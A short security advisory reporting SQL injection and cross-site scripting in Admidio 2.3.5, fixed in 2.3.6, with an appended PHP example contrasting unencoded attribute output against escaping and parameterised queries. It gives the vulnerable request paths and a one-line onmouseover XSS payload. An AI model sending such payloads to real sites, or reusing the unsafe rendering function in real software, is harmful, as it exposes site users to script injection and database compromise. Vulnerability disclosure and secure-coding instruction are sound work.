Title: Admidio 2.3.5 Multiple security vulnerabilities
Author: Stefan Schurtz
Affected software: Successfully tested on Admidio 2.3.5
Vendor website:
Status: Fixed
Vulnerability overview
Admidio 2.3.5 contains XSS and SQLi vulnerabilities
==================
Test
//SQLi
/admidio-2.3.5/adm_program/modules/lists/lists.php?active_role=[sql-injection]
//XSS
/admidio-2.3.5/adm_program/modules/guestbook/guestbook_new.php?headline=" onmouseover=alert(/xss/) "
Solution
Upgrade to the latest version, 2.3.6
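
For code that handles parameters like the two above, the following added example (not Admidio's source and not the 2.3.6 patch, which this advisory does not show) contrasts unencoded attribute output with context-aware encoding, and pairs strict integer validation with a bound query parameter. The function names, the table and column names, and the assumption that active_role is a numeric id are all hypothetical.

```php
<?php
// Added illustration; NOT Admidio source code. All function names are hypothetical.

// Reflecting a request value into an HTML attribute without encoding:
// a double quote in the value closes the attribute, so the text after it
// is parsed by the browser as additional attributes.
function render_headline_unsafe(string $headline): string
{
    return '<input type="text" name="headline" value="' . $headline . '">';
}

// Encode for the attribute context: ENT_QUOTES converts both " and ',
// so the value can no longer terminate the attribute.
function render_headline_safe(string $headline): string
{
    $encoded = htmlspecialchars($headline, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="headline" value="' . $encoded . '">';
}

// Assumption: a role id is a positive integer. Validate strictly and
// return null for anything else, before the value gets near a query.
function parse_role_id($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Bind the validated id as a typed parameter instead of concatenating it.
function fetch_role_members(PDO $db, int $roleId): array
{
    // Table and column names are hypothetical.
    $stmt = $db->prepare('SELECT usr_id FROM members WHERE role_id = :role');
    $stmt->bindValue(':role', $roleId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed sample inputs; the headline value is the one from the advisory.
$headline = '" onmouseover=alert(/xss/) "';
echo render_headline_unsafe($headline), "\n"; // attribute boundary is broken
echo render_headline_safe($headline), "\n";   // quotes arrive as &quot;
var_dump(parse_role_id('7'));   // accepted as an integer
var_dump(parse_role_id('7x'));  // rejected, not an integer
```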